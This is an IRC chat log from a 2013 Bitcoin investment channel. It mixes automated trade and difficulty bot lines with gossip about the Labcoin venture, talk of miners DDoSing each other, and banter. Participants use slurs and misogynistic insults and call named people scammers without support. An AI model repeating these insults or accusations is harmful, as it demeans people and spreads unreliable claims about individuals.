03:36:45 it just goes to further show exactly what forum fuckwits are worth Oct 06 03:36:56 [BTCTC] [LABCOIN] 10112 @ 0.00018719 = 1.8929 BTC [-] {6} Oct 06 03:36:58 comes out of nowhere, "we" and "our company", all "professional" and whatnot... Oct 06 03:37:18 hasn't seen a whole bitcoin in his life. Oct 06 03:37:46 well, they have a history going back to q3 2012 on the forums Oct 06 03:38:11 hehe, the "we" always make me lol Oct 06 03:38:47 dexX7 theswede was registered in march. Oct 06 03:38:49 I should speak on behalf of Pankkake Industries Corporation Limited Oct 06 03:38:49 what history ? Oct 06 03:38:59 [BTCTC] [LABCOIN] 25150 @ 0.00018393 = 4.6258 BTC [-] {4} Oct 06 03:39:01 pankkake what's wrong with kramerica ? Oct 06 03:39:13 theswede is just random pr guy - those are old time scammers Oct 06 03:39:26 some italians Oct 06 03:39:39 right. Oct 06 03:40:21 i wonder what rosenfeld is doing these days. Oct 06 03:41:03 rosenfeld = the bdt guy? Oct 06 03:41:04 hm, yeah my next company will be Vandelay Industries Oct 06 03:41:22 dexX7 meni rosenfeld, the foil for the bdt scam, but much older history. Oct 06 03:41:48 he created a fake "short" asset for pirate, he has a long history of trying to be the "respectable" part of various scams. Oct 06 03:41:53 yeah, i saw some posts of him when i did a quick search for alberto Oct 06 03:43:05 tho after his utter failure to rehabilitate that nick with his "vanity thread" etc i suppose it's not surprising he just let it drop. Oct 06 03:45:04 [HAVELOCK] [DEALCO] 50 @ 0.0074996 = 0.375 BTC [+] {2} Oct 06 03:45:11 Sep 30 22:27:12 once again we advise all investors to buy shares while they are cheap, We are confident in fact that the price will raise tenfold in respect to IPO Oct 06 03:45:11 Sep 30 22:34:00 mircea_popescu: you are simple minded. sorry but your are a psychopathic Oct 06 03:45:17 ahh the good old days of last week! Oct 06 03:46:03 wtf Oct 06 03:46:12 is this from the log? Oct 06 03:46:21 yeah. Oct 06 03:46:32 that was just a faker Oct 06 03:46:47 the original quote is from labcoin made on the forum Oct 06 03:46:49 no, he came here because i went over on their chan for lolz. Oct 06 03:47:07 sure, but it was a troll Oct 06 03:47:17 quoting real things labcoin said though Oct 06 03:47:20 zhenhua_wang = the guy who wrote the message which is on pastebin. he never was here on irc. Oct 06 03:47:25 yup, pankkake Oct 06 03:47:40 pankkake the distinction blurs. Oct 06 03:48:13 labcoin is trolling itself so yes Oct 06 03:48:14 some emo chick that doesn't wash ironically is still an slovenly slut. Oct 06 03:49:31 dexX7 anyway, it's common for pr to repeat the official line. -pr quotes me all the time. Oct 06 03:49:36 how's that prove it's a troll. Oct 06 03:50:01 hm? i'm just saying that "zhenhua_wang" has probably no connection to the "real" labcoin team Oct 06 03:50:22 just to underline that this is not the guy who wrote the message Oct 06 03:53:57 but probably why ? on the basis of what ? Oct 06 03:56:20 1. those quotes are from user "labcoin" (persona "sam" which is actually alessia), 2. howard/zhenhua wang is external and was hired by labcoin to create an asic, 3. wang never appeared on the forums/irc Oct 06 03:56:56 so how likely is it that this guy surprisingly appears on irc to mock labcoiners? Oct 06 03:57:26 according to the messages he was scammed by them, too and he seems to be a nice guy :) Oct 06 03:59:18 [BTCTC] [FN] [COG.F2] 1 @ 0.4 BTC [-] Oct 06 04:03:22 [BTCTC] [LABCOIN] 3671 @ 0.00018207 = 0.6684 BTC [-] {4} Oct 06 04:07:40 we're not discussing whether this guy is or is not X random person irl. Oct 06 04:07:57 we are discussing if this guy was actually paid by / working for labcoin or simply trolling. Oct 06 04:08:11 on the face of what he said, the former would seem to be rather the case. Oct 06 04:09:06 now whether it was really sam/alesia/theswede/whoever the fuck else that came here to bitch under that nick.... who cares. Oct 06 04:09:44 doubt it Oct 06 04:09:51 he just wanted to play with you Oct 06 04:10:29 [BTCTC] [ASICMINER-PT] 2 @ 1.19 = 2.38 BTC [+] Oct 06 04:12:45 right, and the duck i ate earlier was just feigning. Oct 06 04:13:18 because it's really impossible it be the case that the redditard generation is quite fucking stupid enough to do something on sept 30th and the exact oposite on oct 5 Oct 06 04:13:43 without being able to actually confront the fact that looky how fucking retarded we are. Oct 06 04:15:19 you're such a simple minded psychopathic :) Oct 06 04:15:20 [03:13] we'll put motion up as soon as the board is up Oct 06 04:15:21 [03:13] to take over the company form the scammers Oct 06 04:15:22 [03:13] 70% is majority by far Oct 06 04:15:24 lol Oct 06 04:15:34 [BTCTC] [LABCOIN] 19999 @ 0.00018124 = 3.6246 BTC [-] {2} Oct 06 04:15:37 those guys are still deluding themselves Oct 06 04:18:59 in other news, http://trilema.com/wp-content/uploads/2012/02/salo-9.jpg Oct 06 04:32:51 [BTCTC] [LABCOIN] 50269 @ 0.00015826 = 7.9556 BTC [-] {10} Oct 06 04:39:58 [BTCTC] [LABCOIN] 728 @ 0.00018056 = 0.1314 BTC [+] {2} **** BEGIN LOGGING AT Sun Oct 6 09:32:25 2013 Oct 06 09:42:39 http://gizmodo.com/does-political-belief-make-you-suck-at-math-1440010845 Oct 06 09:42:44 basically, it does. Oct 06 09:52:07 [MPEX] [S.MPOE] 1700 @ 0.00085412 = 1.452 BTC [+] Oct 06 09:56:11 [MPEX] [S.MPOE] 4986 @ 0.00084993 = 4.2378 BTC [-] {2} **** BEGIN LOGGING AT Sun Oct 6 10:11:37 2013 Oct 06 10:13:28 [BTCTC] [LABCOIN] 8069 @ 0.00014168 = 1.1432 BTC [-] {8} Oct 06 10:17:32 [HAVELOCK] [CBTC] 500 @ 0.00028844 = 0.1442 BTC [+] Oct 06 10:18:33 [HAVELOCK] [CBTC] 500 @ 0.00028844 = 0.1442 BTC [+] Oct 06 10:33:48 [HAVELOCK] [HIM] 3 @ 0.11 = 0.33 BTC [-] Oct 06 11:08:24 good day gents Oct 06 11:14:41 .d Oct 06 11:14:41 148819199.80509 | Next Diff in 42 blocks | Estimated Change: 27.4550% in 0d 4h 58m 59s Oct 06 11:21:51 ;;genrate 30000 Oct 06 11:21:52 The expected generation output, at 30000.0 Mhps, given difficulty of 148819199.805, is 0.101379361754 BTC per day and 0.00422414007307 BTC per hour. Oct 06 11:21:58 heya. Oct 06 11:23:37 [MPEX] [S.MPOE] 5773 @ 0.00084887 = 4.9005 BTC [-] Oct 06 11:26:54 How are you MP? Oct 06 11:27:41 [HAVELOCK] [AM100] 9 @ 0.01189999 = 0.1071 BTC [+] Oct 06 11:34:46 great. Oct 06 11:39:23 That is good to hear, I am having a quiet evening watching a sliver of the moon sitting on a beautiful sunset. It feels as though everything is right in the world. Oct 06 11:54:07 [BTCTC] [DMS.MINING] 250 @ 0.00121157 = 0.3029 BTC [-] {4} Oct 06 11:58:22 http://articles.timesofindia.indiatimes.com/2013-09-18/science/42182028_1_sunspots-maunder-minimum-solar-cycle Oct 06 11:58:23 Solar activity drops to 100-year low, puzzling scientists - Times Of India Oct 06 12:03:17 [BTCTC] [LABCOIN] 35505 @ 0.00013024 = 4.6242 BTC [-] {10} Oct 06 12:10:11 its man made. Oct 06 12:10:24 [BTCTC] [LABCOIN] 822 @ 0.0001226 = 0.1008 BTC [-] Oct 06 12:11:08 indeed, 10,000 year model is no good with the cosmos Oct 06 12:11:51 esp when it's a 55 year model extrapolated through the use of purpose-tailored math. Oct 06 12:15:22 dont get met started on the misuse of orbital telescopes Oct 06 12:15:38 :p Oct 06 12:18:07 http://www.youtube.com/watch?v=c9VQye6P8k0 Oct 06 12:18:08 Patience - YouTube Oct 06 12:22:48 this has got to be the best google translate ever : http://postimg.org/image/4dyqw79x3/ Oct 06 12:23:25 savage Oct 06 12:58:28 http://i.imgur.com/4nsBBpq.jpg just a morning wo..er wisdom Oct 06 13:00:19 are the passwords of bitcointalk salted? If so, were the hackers able to read out the salted random numbers? Oct 06 13:04:58 The whole enterprise of counting publications as a means to evaluating research excellence is pernicious and completely absurd. If a 12 year-old were to write 'I fink that Enid Blyton iz bettern than that Emily Bronte bint cos she has written loads more books' then one could reasonably excuse the spelling as reflective of the stupidity of the mind that produced the content. What we now have in academia is a situation Oct 06 13:04:58 where intelligent men and women prostitute themselves to an ideal which no intelligent person could believe. Oct 06 13:05:27 b0n1 as far as anyone knows they were not salted but put through 7500 iterations of whatever goop. Oct 06 13:12:24 that's pretty much what all scientists say - or maybe I have biais on those I know Oct 06 13:12:28 and yet, it goes on Oct 06 13:14:27 [HAVELOCK] [NEOBEE] 40 @ 0.002979 = 0.1192 BTC [+] {2} Oct 06 13:16:13 http://www.youtube.com/watch?v=MmeTAWyXx00 Oct 06 13:16:14 Bob Marley Babylon System Demo 1979 - YouTube Oct 06 13:20:33 [BTCTC] [LABCOIN] 5978 @ 0.00012292 = 0.7348 BTC [-] {3} Oct 06 13:22:35 [BTCTC] [LABCOIN] 13000 @ 0.0001227 = 1.5951 BTC [-] {2} Oct 06 13:22:35 [BTCTC] [BTC-BOND] 90 @ 0.0098 = 0.882 BTC [-] Oct 06 13:33:18 a funny thing i have noticed about university et al, is that professors will get students to write and submit papers that for the basis of what they want to say later Oct 06 13:33:25 *form Oct 06 13:34:29 form over substance Oct 06 13:34:47 [BTCTC] [B] [CIPHERMINE.B1] 40 @ 0.00812 = 0.3248 BTC [-] Oct 06 13:34:47 [BTCTC] [COGNITIVE] 3 @ 0.0816 = 0.2448 BTC [+] Oct 06 13:36:13 it can be called gruntwork, but when someone else is pulling the strings... Oct 06 13:36:49 [BTCTC] [ESECURITYSABTC] 3 @ 0.1346 = 0.4038 BTC [+] Oct 06 13:39:45 ;;bc,stats Oct 06 13:39:48 Current Blocks: 262051 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 28 blocks | Next Difficulty In About: 3 hours, 6 minutes, and 39 seconds | Next Difficulty Estimate: 189402885.915 | Estimated Percent Change: 27.27046 Oct 06 13:40:12 lol it's going to be 30% again? Oct 06 13:40:52 and this despite the many ddoes Oct 06 13:41:20 theres some facinating data mining going on in neroscience that throws the convention oh "hypothesis" out the window Oct 06 13:47:26 imaging crazy brains is cool science Oct 06 13:49:19 and when those wizards release their tools to the genetecists, boom, info 2.0 Oct 06 13:57:50 psychiatry, where philospohy meets science Oct 06 14:00:11 [BTCTC] [PAJKA.BOND] 52 @ 0.01 = 0.52 BTC [-] Oct 06 14:00:28 datamining with obscure data. dem patents Oct 06 14:01:12 [BTCTC] [PAJKA.BOND] 26 @ 0.008002 = 0.2081 BTC [-] Oct 06 14:03:42 its a pity how all the good shit is fully funded Oct 06 14:07:59 http://www.reddit.com/r/AskReddit/comments/1nt0k3/what_is_something_youve_seen_that_no_one_will/cclqu68 the shit i'm reading sometimes Oct 06 14:08:09 i should stop Oct 06 14:08:56 is america still a thing? Oct 06 14:09:25 it's a hypothesis Oct 06 14:10:02 its people and acres and a spirit of innovation Oct 06 14:10:14 and bald eagles Oct 06 14:10:16 but theyre all mental Oct 06 14:12:58 weve got fucking wedge tailed eagles which are way more boss, and would beast a bald eagle in any competition imaginable except baldness, and we just go about our business and don't parade our awesome eagles much very oft at all Oct 06 14:13:10 "Now, I I only had a government..." Oct 06 14:13:56 http://www.reddit.com/r/MURICA/ is fun Oct 06 14:13:57 'MURICA FUCK YEAH! Oct 06 14:14:26 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] Oct 06 14:25:26 australia is best ralia http://www.youtube.com/watch?v=5fXO0CDSZT0 Oct 06 14:37:52 also mining lease fees ahvent changed for 100 years, and we got rocks Oct 06 14:39:51 kennilworth investors bought the operators a landcruiser and some salaries Oct 06 14:39:51 [BTCTC] [LABCOIN] 7800 @ 0.00014788 = 1.1535 BTC [+] {4} Oct 06 14:40:36 the magnetic imaging was done,it was double talk and paper pushing Oct 06 14:41:40 real miners never own the land where the lease is Oct 06 14:42:05 unless it wasnt owned before Oct 06 14:46:47 mining warden is nearly as boss as queen here Oct 06 14:52:03 [HAVELOCK] [NEOBEE] 100 @ 0.0029 = 0.29 BTC [-] Oct 06 14:55:38 goes like this Oct 06 14:56:20 applicant: i want 100 hectares as bordered by hese coordinates Oct 06 14:56:51 so kenilworthnothing is a scam? Oct 06 14:57:05 warden: are the borders runnung north south and east west and do you have the $374 and the approprate form Oct 06 14:57:16 applicant: yes Oct 06 14:57:34 warden: will you attempt to mine the and in your lifetime? Oct 06 14:57:44 applicant: yes Oct 06 14:57:57 warden: the court accepts the license Oct 06 14:58:44 pankkake, how much money did they get? Oct 06 14:59:04 I don't know, didn't follow it much Oct 06 14:59:48 i dont think its a scam by australian standards, but i'm guessing if they wanted they could chase burnside for more money Oct 06 15:00:11 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 06 15:00:38 are they listed on the asx too? its well dodgy Oct 06 15:02:33 its about what one would expect with a speculative mining lease multiplied by bitcoin 2013 Oct 06 15:04:16 and i'd say if the ira was a bother to uncle sam, their names might ring bells with prism Oct 06 15:05:44 but weve got more war criminals and psycopaths per capita than south amrica, so who cares Oct 06 15:06:28 freedom fighters, whatever your fancy Oct 06 15:09:09 I have a hard time understanding your points Oct 06 15:10:08 the world isnt big enough for speculative leaseholders anymore Oct 06 15:10:32 what you want is smart dudes, on the ground, mining in cheap labour countries Oct 06 15:10:58 gold in the philippines and africa Oct 06 15:11:09 people skills Oct 06 15:12:24 not buying diggers incase the land is profitable Oct 06 15:13:32 coz when the go bankrupt, they keep the diggers in the shed until after the creditors are paid, and noone stops them Oct 06 15:14:26 its the third oldest trick in the book, after selling your cooch and "get em hooked and jack up the price" Oct 06 15:15:27 [HAVELOCK] [NEOBEE] 516 @ 0.0029 = 1.4964 BTC [-] Oct 06 15:16:28 [HAVELOCK] [NEOBEE] 37 @ 0.00285003 = 0.1055 BTC [-] Oct 06 15:17:29 [BTCTC] [ASICMINER-PT] 3 @ 1.25 = 3.75 BTC [-] {3} Oct 06 15:22:32 kenilworth is a mining lease taken out on a family farm with no intention of ever mining or allowing it to be mined, if there's even anything there Oct 06 15:24:05 new landcruiser. Oct 06 15:25:37 [BTCTC] [FN] [BTC-GROWTH] 10 @ 0.08 = 0.8 BTC [-] Oct 06 15:32:12 im gonna have to get a gun like mp if i keep talking shit on the internet Oct 06 15:33:08 i imagine he had a german made 45 pistol Oct 06 15:33:51 the kind of thing that stops a conversation abruptly Oct 06 15:39:46 i imagine one can be a gentleman and own a gun in romania, but i might be wrong Oct 06 15:42:31 manila, now there you buy a $10 license and its cod machine pistols Oct 06 15:44:51 is just that little bit right of guam you know Oct 06 15:48:34 pankkake was it you talking of laying new sea cables the other day? Oct 06 15:48:41 no Oct 06 15:48:47 oh Oct 06 15:53:29 are you asian? Oct 06 15:54:19 coz asia is the place to lay cable Oct 06 15:56:06 [HAVELOCK] [AM100] 50 @ 0.0120685 = 0.6034 BTC [+] {4} Oct 06 15:56:07 http://upload.wikimedia.org/wikipedia/commons/7/71/Lower_NTK_Estate_old_squat_toilet.jpg Oct 06 15:56:19 goat Oct 06 15:59:54 coming soon to the crime section of bankok international airbort bookshop Oct 06 16:00:20 how dpr1.0 framed dpr2.0 for his own murder Oct 06 16:01:41 everyone gets off and they take more acid Oct 06 16:02:13 [HAVELOCK] [B] [XBOND] 136 @ 0.001244 = 0.1692 BTC [-] Oct 06 16:02:39 http://www.youtube.com/watch?v=_lTAT0dZMRw Oct 06 16:02:39 Scott McKenzie - San Francisco REMIX - YouTube Oct 06 16:03:18 .d Oct 06 16:03:18 148819199.80509 | Next Diff in 13 blocks | Estimated Change: 26.9513% in 0d 1h 30m 32s Oct 06 16:04:14 [BTCTC] [ASICMINER-PT] 11 @ 1.26 = 13.86 BTC [+] Oct 06 16:05:40 cexio 2002 Oct 06 16:06:16 [BTCTC] [ASICMINER-PT] 1 @ 1.263 BTC [+] Oct 06 16:18:59 no riddles today, theres a solar storm coming in three days Oct 06 16:19:55 id bitbet it, but it would be immoral Oct 06 16:23:26 yes i mean a coronal ejection from the sun Oct 06 16:24:44 quantify the magnitude you say? Oct 06 16:25:36 [HAVELOCK] [B] [XBOND] 1308 @ 0.00125214 = 1.6378 BTC [+] {6} Oct 06 16:26:47 i say print out your bitcoin wallets just in case Oct 06 16:32:43 [HAVELOCK] [AM100] 68 @ 0.01206999 = 0.8208 BTC [+] Oct 06 16:33:44 [HAVELOCK] [AM100] 405 @ 0.01214887 = 4.9203 BTC [+] {3} Oct 06 16:38:56 http://www.youtube.com/watch?v=KnBi-LNM0Og Oct 06 16:38:57 Happy Mondays - Step On - YouTube Oct 06 16:42:50 http://www.coindesk.com/bitcoin-payment-protocol-makeover/ - plan to establish bitcoin certificate authorities Oct 06 16:43:28 But concerns over certificate security irritate Hearn. “The reality is that [certificate technology] is the best we’ve got, it’s being improved via initiatives like cert transparency, and it has a track record of stopping worst case adversaries.” Oct 06 16:44:17 i want afuckin refund Oct 06 16:44:41 not a single word who shall manage the root certificate Oct 06 16:45:11 Vexual: sorry to break your happy mood Oct 06 16:45:21 ya cant Oct 06 16:49:12 oh it's prolly meant to build on existing SSL CA infrastructure?... god save us Oct 06 16:49:18 seems like bitcoin devs are going beyond what is required of the blockchain Oct 06 16:50:55 oh, they do it since satoshi left. except when they have to fix the breakage. Oct 06 16:51:16 but we dont have to bip Oct 06 16:51:38 satoshi left ike dpr1.0 Oct 06 16:52:12 except satoshi didnt keep getting a paycheck Oct 06 16:52:57 hey i made a disruptive thing, im audi Oct 06 16:54:36 you mean like we "don't have to" buy a recognized ssl certificate? Oct 06 16:55:11 i can see where this is supposed to go... to provide "SSL-secured(r)(tm) bitcoin deposit address" Oct 06 16:55:27 you'll have to pay CA scammers for ssl cert? Oct 06 16:55:35 dont make me say it Oct 06 16:56:36 cause, how else will the poor customer be sure the address is really yours? Oct 06 16:56:49 read Oct 06 16:56:58 makes me sick... hopefully this won't fly Oct 06 16:57:14 it will, you dont need to use it Oct 06 16:58:46 me not. but what if i get inquiries like "but my wallet says coinbr deposit address is untrusted!!!"? Oct 06 16:58:59 :) Oct 06 17:00:42 relax Oct 06 17:00:47 bitcoin developers using broken CA system when they have… namecoin Oct 06 17:01:52 ill grant you its more kinds or irony than a trilemma post, but just like them, don't lose no sleep Oct 06 17:01:57 pankkake: this. or the addy can be verified in distributed manner by other my customers gpg signing it Oct 06 17:03:21 heck, or even btc-signing it Oct 06 17:05:31 my handspan exceeds my inet nippular siastance Oct 06 17:05:36 *inter Oct 06 17:05:42 *distance Oct 06 17:06:30 and what does it mean? heightened testosterone? Oct 06 17:06:41 marfans? Oct 06 17:08:20 kleptomania? Oct 06 17:10:41 no Oct 06 17:11:03 i just like vectors Oct 06 17:11:21 where do you live jurov? Oct 06 17:12:30 i like to work out the geographical crow flight half way point Oct 06 17:13:25 ill also just get your mothers maiden name for your star chart Oct 06 17:14:25 wait, they use what now in star charts? Oct 06 17:14:38 penis size? Oct 06 17:15:18 its just for the chart Oct 06 17:15:24 [BTCTC] [DMS.MINING] 84 @ 0.001221 = 0.1026 BTC [-] Oct 06 17:15:59 and i did tell where i live several times already, do your research Oct 06 17:16:10 did you? Oct 06 17:16:20 ddid i? Oct 06 17:16:25 [BTCTC] [PETA-MINE] 8 @ 0.4625 = 3.7 BTC [+] Oct 06 17:16:38 i actually am interested in halfway Oct 06 17:16:47 unlike your mother or your penis Oct 06 17:18:00 as a bonus you get to knpow the direction to avoid Oct 06 17:18:27 as a result of half-assed research? Oct 06 17:18:48 if, then i want full-assed one Oct 06 17:19:39 well im gessing its somewhere in the middle of the pacific' Oct 06 17:20:05 see how i dropped the u? Oct 06 17:20:48 no idon't want to see what ur doing with the keyboard Oct 06 17:21:49 i always eat the extra enter key Oct 06 17:22:13 vexual pinoy ka ba? Oct 06 17:22:19 muzta? Oct 06 17:22:23 shabbadabba Oct 06 17:22:36 siiiiige Oct 06 17:22:46 yeah i dont know what that is Oct 06 17:23:08 where are u vancleef? holland? Oct 06 17:23:15 brazil Oct 06 17:23:29 i didn't considered human tallow there edible Oct 06 17:23:35 *consider Oct 06 17:24:26 human tallow? fork man Oct 06 17:24:39 are u dutch vancleef? Oct 06 17:24:45 on the other enter key Oct 06 17:24:54 our halfway is pacific ocean Oct 06 17:24:56 i'm not a filthy dutchmen Oct 06 17:25:09 why so van? Oct 06 17:25:32 because i use soap Oct 06 17:26:05 to the root? Oct 06 17:26:45 i dont believe in your magic Oct 06 17:26:50 i dont undertsnad the connection Oct 06 17:26:55 i think our halfway is the atlantic then Oct 06 17:28:25 wise Oct 06 17:28:47 MtGox BTCUSD ticker | Best bid: 135.01509, Best ask: 135.49499, Bid-ask spread: 0.47990, Last trade: 135.00505, 24 hour volume: 3673.53219031, 24 hour low: 135.00505, 24 hour high: 138.00000, 24 hour vwap: 136.56759 Oct 06 17:30:06 vancannibal, our halfway could be mauritius if we went the ,ong way Oct 06 17:33:28 sau paulo Oct 06 17:36:23 your dad made a machine Oct 06 17:40:50 [BTCTC] [LABCOIN] 7574 @ 0.00013347 = 1.0109 BTC [-] {6} Oct 06 17:42:52 [HAVELOCK] [AM100] 10 @ 0.0124 = 0.124 BTC [+] Oct 06 17:44:54 [HAVELOCK] [CFIG] 1 @ 0.12 BTC [+] Oct 06 17:47:57 [BTCTC] [LABCOIN] 7574 @ 0.0001304 = 0.9876 BTC [-] {2} Oct 06 17:47:57 [HAVELOCK] [AM1] 3 @ 1.2889 = 3.8667 BTC [+] {2} Oct 06 17:56:05 [MPEX] [S.MPOE] 3500 @ 0.00084843 = 2.9695 BTC [-] {2} Oct 06 17:59:08 [BTCTC] [B] [CIPHERMINE.B1] 20 @ 0.0082 = 0.164 BTC [+] Oct 06 18:00:09 [BTCTC] [LABCOIN] 80610 @ 0.00012366 = 9.9682 BTC [-] {6} Oct 06 18:00:09 [BTCTC] [DMS.MINING] 1116 @ 0.00129789 = 1.4484 BTC [+] {2} Oct 06 18:02:16 http://ethno.ihp.sinica.edu.tw/en/southwest/imgs/WA/WA_07-06.jpg Oct 06 18:03:12 [BTCTC] [B] [CIPHERMINE.B1] 180 @ 0.0082 = 1.476 BTC [+] Oct 06 18:08:44 http://www.youtube.com/watch?v=wfS5tgNC6qw Oct 06 18:08:44 BULLET STUNT KAMMO TAKHAR - YouTube Oct 06 18:13:22 [HAVELOCK] [AM1] 2 @ 1.29000001 = 2.58 BTC [+] Oct 06 18:14:23 [BTCTC] [LABCOIN] 6450 @ 0.0001517 = 0.9785 BTC [+] {3} Oct 06 18:14:24 [HAVELOCK] [AM1] 3 @ 1.3 = 3.9 BTC [+] {2} Oct 06 18:16:26 [HAVELOCK] [AM1] 2 @ 1.29000001 = 2.58 BTC [-] Oct 06 18:22:04 there was a storm on the 3rd, i might be wrong Oct 06 18:22:22 fuck it, let it ride Oct 06 18:22:56 10/10/13 Oct 06 18:37:47 [HAVELOCK] [AM1] 1 @ 1.28 BTC [-] Oct 06 18:41:51 [BTCTC] [MININGCO.ETF] 29 @ 0.01256896 = 0.3645 BTC [+] {3} Oct 06 18:42:51 [HAVELOCK] [LABCO] 256 @ 0.00066004 = 0.169 BTC [-] {3} Oct 06 18:43:52 [HAVELOCK] [LABCO] 212 @ 0.00065094 = 0.138 BTC [-] {2} Oct 06 18:49:58 [BTCTC] [ASICMINER-PT] 1 @ 1.266 BTC [+] Oct 06 18:53:01 [BTCTC] [FN] [BTC-GROWTH] 5 @ 0.08 = 0.4 BTC [-] Oct 06 18:54:02 [BTCTC] [ASICMINER-PT] 8 @ 1.298875 = 10.391 BTC [+] {2} Oct 06 19:00:08 [BTCTC] [ASICMINER-PT] 13 @ 1.299 = 16.887 BTC [+] Oct 06 19:02:10 [BTCTC] [BASIC-MINING] 8 @ 0.04197 = 0.3358 BTC [+] Oct 06 19:07:23 ThickAsThieves: Your presence is requested in #asicminer Oct 06 19:20:34 any competition imaginable except baldness << lmao Oct 06 19:24:26 so kenilworthnothing is a scam? << it's an amazing business minus the amazing and the business part. Oct 06 19:24:28 AMAZING COMPANY! Oct 06 19:24:28 AMAZING COMPANY! Oct 06 19:27:01 jurov that dude is retarded jesus. Oct 06 19:27:54 who? vexual? Oct 06 19:28:35 no hearn & co. Oct 06 19:29:00 "certificates are shit but nevertheless i don't understand anything and really want to matter so here's my authoritative opinion on shit i really have no business discussing Oct 06 19:29:17 please pay attention to me because i hjave a proven track record of having accidentally forked the chain and i really suck at coding" Oct 06 19:32:25 anyway, forget about power rangers. here : The programmer’s wife tells him: “Run to the store and pick up a loaf of bread. If they have eggs, get a dozen.”. He comes back with 12 loaves of bread. Oct 06 19:33:35 < mircea_popescu> HH so kenilworthnothing is a scam? << it's an amazing business minus the Oct 06 19:33:36 AMAZING COMPANY! Oct 06 19:33:38 amazing and the business part. - lol Oct 06 19:33:39 AMAZING COMPANY! Oct 06 19:35:33 ;;bc,stats Oct 06 19:35:35 Current Blocks: 262097 | Current Difficulty: 1.8928124928103292E8 | Next Difficulty At Block: 264095 | Next Difficulty In: 1998 blocks | Next Difficulty In About: 1 week, 2 days, 16 hours, 46 minutes, and 36 seconds | Next Difficulty Estimate: 326660200.57 | Estimated Percent Change: 72.57927 Oct 06 19:37:33 mircea_popescu: "I gave the fool an ax, so he would bring some twigs; so to the mosque he ran, and smashed the door to sticks." Oct 06 19:38:02 (impromptu hack of a translation from russian, originally of a persian rhyme, that i read as a kid.) Oct 06 19:38:46 (re: programmer & his bread.) Oct 06 19:40:26 :p Oct 06 19:40:46 about the ddoses : i suspect bitcoin mining will fundamentally change the way internet adressing works. Oct 06 19:41:09 the problem is that even if you aren't trying to do a 50% attack, it is now more lucrative to ddos someone than to increase your mining farm. Oct 06 19:41:39 if you hold 10% of hashpower and another dork holds 10% of hashpower, you can either spend mns of dollars to add another 1% to your hashing or to knock him offline Oct 06 19:41:59 never before has it actually been millions of dollars in cash for ddosing a target. Oct 06 19:42:23 knocking the competing miner offline helps all of the survivors, not just you, though Oct 06 19:42:27 and quite frankly nothing else happening on the internet today matters by comparison, so it'll have to change. Oct 06 19:42:41 asciilifeform yeah. which is why you can probably just start it and they'll pile in. Oct 06 19:42:46 becomes very much lord of the flies. Oct 06 19:43:34 when rats in a box, they eat each other, the last one dies of its wounds, and the box will eventually contain something else. Oct 06 19:45:24 exactly. Oct 06 19:45:50 this is much more of a problem for the future than anything the retardevs are fiddling with. Oct 06 19:46:30 the sad part is that this isn't even a hard problem. Oct 06 19:46:55 im not so sure. Oct 06 19:48:54 trivial solution: a kind of reverse mining pool, where people are paid small btc continuously to run single-purpose proxies Oct 06 19:49:07 that makes your mega-asic-cluster look like a mining botnet Oct 06 19:49:14 nothing to ddos Oct 06 19:50:40 or, more intelligently, solo mining distributed over multiple independent proper btc nodes. Oct 06 19:52:00 [BTCTC] [DMS.MINING] 1343 @ 0.001221 = 1.6398 BTC [-] Oct 06 19:56:01 wouldnt that make it more robust and less prone to failure Oct 06 19:56:04 [BTCTC] [B] [CIPHERMINE.B1] 212 @ 0.0082 = 1.7384 BTC [+] Oct 06 19:58:06 [BTCTC] [RSM] 124 @ 0.0025 = 0.31 BTC [-] Oct 06 19:59:07 [BTCTC] [RSM] 164 @ 0.002501 = 0.4102 BTC [+] Oct 06 19:59:22 the latter would be the ideal solution. Oct 06 19:59:37 my secret hope is that THIS is what will end up resolving the "not paid to convey tx" problem Oct 06 19:59:45 you will be paid, by the miners who don't want to be ddos'd to shit. Oct 06 20:00:15 if that indeed is how the chips fall i'll be quite impressed with satoshi's genius, for originally i thought the node pauyment problem was oversight. Oct 06 20:02:10 [BTCTC] [LABCOIN] 18000 @ 0.00016296 = 2.9333 BTC [+] {6} Oct 06 20:02:10 [HAVELOCK] [AM100] 115 @ 0.01255 = 1.4433 BTC [-] {2} Oct 06 20:03:10 [BTCTC] [LABCOIN] 2000 @ 0.0001749 = 0.3498 BTC [+] Oct 06 20:06:13 [BTCTC] [LABCOIN] 4832 @ 0.000175 = 0.8456 BTC [+] Oct 06 20:06:28 fuckin microtik, pressed the wrong button, lost an hour of life. Oct 06 20:07:14 [BTCTC] [LABCOIN] 2000 @ 0.0001787 = 0.3574 BTC [+] Oct 06 20:08:15 [BTCTC] [LABCOIN] 2458 @ 0.0001788 = 0.4395 BTC [+] Oct 06 20:08:36 kakobrekla same thing happened to me earlier. Oct 06 20:09:17 was fondling this chick, accidentally touched the button, one hour later i was back on my feet. Oct 06 20:09:44 :p Oct 06 20:09:50 I'm not sure I understand this analogy Oct 06 20:10:34 also, microtik does not respect your freedoms Oct 06 20:10:45 http://www.urbit.org/2013/09/26/palaz.html < loller. Oct 06 20:10:46 Urbit - Tea at the Palaz of Hoon Oct 06 20:11:38 what? and bitches do respect? Oct 06 20:12:07 totally. Oct 06 20:12:14 mircea i read that yest, had brain meltdown, filed it for later Oct 06 20:12:17 if they don't it's the little room for them. Oct 06 20:12:50 jurov for the record, i'm not pushing it, asciilifeform is pushing it. imo the guy's walking around with shoes too large for his feet. but anyway. Oct 06 20:14:19 yea i know it's originally from him.. and i understood so far he sems to intend to implement some Oct 06 20:14:33 insanely simplified functional language Oct 06 20:14:43 in , say, 500 transistors Oct 06 20:14:59 and thus make provably correct hardware Oct 06 20:15:16 basically, let's take all the reason people don't use forth and add mud. Oct 06 20:16:24 [BTCTC] [LABCOIN] 10001 @ 0.0001787 = 1.7872 BTC [-] {2} Oct 06 20:18:26 [HAVELOCK] [AM100] 25 @ 0.01250002 = 0.3125 BTC [-] Oct 06 20:19:27 [HAVELOCK] [AM100] 78 @ 0.01250001 = 0.975 BTC [-] {2} Oct 06 20:24:32 [HAVELOCK] [AM100] 477 @ 0.01250041 = 5.9627 BTC [+] {2} Oct 06 20:26:59 this urbit thing is neato Oct 06 20:31:39 [HAVELOCK] [AM100] 63 @ 0.01288959 = 0.812 BTC [+] {4} Oct 06 20:51:10 hi Oct 06 20:51:59 [HAVELOCK] [AM100] 52 @ 0.01289999 = 0.6708 BTC [+] Oct 06 20:53:53 mircea_popescu: i've got a list of magistrate judges that were serving in 